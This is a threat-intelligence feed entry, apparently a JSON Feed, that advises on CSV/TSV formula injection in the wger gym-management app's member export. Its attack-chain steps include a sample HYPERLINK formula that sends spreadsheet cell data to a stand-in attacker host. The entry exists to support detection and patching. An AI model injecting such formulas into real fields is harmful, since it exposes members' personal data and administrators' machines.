{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/formula-injection/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["wger (\u003c= 2.5)"],"_cs_severities":["high"],"_cs_tags":["csv-injection","formula-injection","web-application","data-exfiltration"],"_cs_type":"advisory","_cs_vendors":["wger"],"content_html":"\u003cp\u003ewger, a web-based workout and gym management application, is vulnerable to CSV/TSV formula injection. This flaw stems from the application\u0026rsquo;s failure to sanitize user-supplied \u003ccode\u003efirst_name\u003c/code\u003e and \u003ccode\u003elast_name\u003c/code\u003e fields when exporting gym member data to TSV format. A malicious gym member can inject spreadsheet formulas (e.g., using \u003ccode\u003e=HYPERLINK\u003c/code\u003e) into their profile, which are then stored in the database. When a gym administrator exports the member list using the affected endpoint (\u003ccode\u003e/en/gym/export/users/\u0026lt;gym_pk\u0026gt;\u003c/code\u003e) and opens the TSV file in a spreadsheet application like Excel or LibreOffice Calc, the injected formula executes within the administrator\u0026rsquo;s local context, potentially enabling data exfiltration or even arbitrary code execution on older Excel versions with Dynamic Data Exchange (DDE) enabled. This vulnerability affects wger versions 2.5 and earlier, and poses a significant risk to organizations using wger to manage sensitive gym member data.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA malicious gym member registers or modifies their profile via the profile edit endpoint.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a malicious formula (e.g., \u003ccode\u003e=HYPERLINK(\u0026quot;http://attacker.example/?p=\u0026quot;\u0026amp;A1,\u0026quot;click\u0026quot;)\u003c/code\u003e) into the \u003ccode\u003efirst_name\u003c/code\u003e or \u003ccode\u003elast_name\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eThe wger application stores the unsanitized formula in the database.\u003c/li\u003e\n\u003cli\u003eA gym administrator with \u003ccode\u003emanage_gym\u003c/code\u003e permission initiates a member list export via \u003ccode\u003eGET /en/gym/export/users/\u0026lt;gym_pk\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe server generates a TSV file containing the injected formula in the corresponding user\u0026rsquo;s \u003ccode\u003efirst_name\u003c/code\u003e or \u003ccode\u003elast_name\u003c/code\u003e field.\u003c/li\u003e\n\u003cli\u003eThe administrator downloads the TSV file.\u003c/li\u003e\n\u003cli\u003eThe administrator opens the TSV file using a spreadsheet application (e.g., Excel, LibreOffice Calc).\u003c/li\u003e\n\u003cli\u003eThe spreadsheet application executes the injected formula, potentially exfiltrating data to \u003ccode\u003eattacker.example\u003c/code\u003e or, with DDE enabled, executing arbitrary commands on the administrator\u0026rsquo;s workstation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can have severe consequences. An attacker could exfiltrate sensitive data, including other members\u0026rsquo; email addresses, phone numbers, and other PII visible in the spreadsheet. In older versions of Excel with DDE enabled, the attacker could achieve arbitrary code execution on the administrator\u0026rsquo;s workstation. This could lead to complete system compromise, allowing the attacker to install malware, steal credentials, or perform other malicious activities. Since this can occur every time the administrator performs a member export, the vulnerability poses a persistent risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u003ccode\u003ewger-csv-injection-export\u003c/code\u003e Sigma rule to detect when a gym administrator exports user data while a malicious formula is present in the database.\u003c/li\u003e\n\u003cli\u003eDeploy the \u003ccode\u003ewger-csv-injection-profile-update\u003c/code\u003e Sigma rule to detect suspicious profile updates containing formula prefixes.\u003c/li\u003e\n\u003cli\u003eApply the vendor-supplied patch, which implements formula prefix sanitization, as detailed in the advisory.\u003c/li\u003e\n\u003cli\u003eEducate administrators about the risks of opening untrusted TSV/CSV files in spreadsheet applications.\u003c/li\u003e\n\u003cli\u003eDisable DDE in legacy Excel installations to prevent potential remote code execution.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for outbound connections to suspicious domains, as exfiltration may occur via the HYPERLINK or WEBSERVICE functions. Block the \u003ccode\u003eattacker.example\u003c/code\u003e domain at the DNS resolver if observed.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wger-csv-injection/","summary":"A CSV/TSV injection vulnerability exists in wger \u003c= 2.5, allowing malicious gym members to inject spreadsheet formulas into their profiles, which are then executed when an administrator exports and opens the member list, potentially leading to data exfiltration and remote code execution.","title":"wger CSV/TSV Formula Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-wger-csv-injection/"}],"language":"en","title":"CraftedSignal Threat Feed — Formula-Injection","version":"https://jsonfeed.org/version/1.1"}